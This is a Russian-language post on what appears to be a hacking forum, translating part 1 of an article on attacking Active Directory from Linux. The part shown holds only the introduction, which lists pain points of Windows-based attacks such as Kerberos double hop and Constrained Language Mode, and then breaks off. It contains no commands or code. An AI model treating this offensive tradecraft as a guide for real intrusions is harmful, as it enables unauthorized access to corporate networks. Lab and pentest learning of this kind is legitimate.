What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Искусство взлома Active Directory с Linux (1 часть)

wesskibo

Light Weight
Депозит
$0
Первоисточник: https://gatari.dev/posts/the-art-of-exploiting-ad-from-linux/#what-if-i-have-no-credentials
Перевел: wesskibo специально для .is

ДИСКЛЕЙМЕР

Я не программист, а так же не разбираюсь в тех.части, потому перевод местами может быть не корректным. Не засоряйте тему исправлениями, отпишите в ПМ форума где есть ошибки, всем заранее спасибо!

Статья разделена на 2 части, так как я достиг ограничения по картинкам на форуме!
Вторая часть доступна по ссылке:
threads/125578/

Введение

За время работы в лабораториях по Active Directory и помощи друзьям с их лабами я понял одно: дебагать Windows — это просто жесть.

Почти нереально нагуглить ошибки, так как они либо слишком общие, либо уникальные для конкретной атаки, над которой работаешь, и зачастую сообщения об ошибках сбивают с толку. Плюс, команды, которые работают у меня, могут не работать у других. И надо учитывать много других моментов, таких как:

• Есть ли у тебя активный тикет, привязанный к сессии? (проблема с Kerberos Double Hop)
  • Если тикета нет, есть ли у тебя учетные данные для обертки команд в объект PS Credential?
  • Ограничивает ли тебя PowerShell Constrained Language Mode (CLM)?
  • Ну, а klist purge точно очищает все тикеты, верно?

В этом посте я расскажу о причинах, почему атака на Active Directory с Linux, на мой взгляд, предпочтительнее, чем с Windows, а также приведу примеры, как это сделать.

Но почему?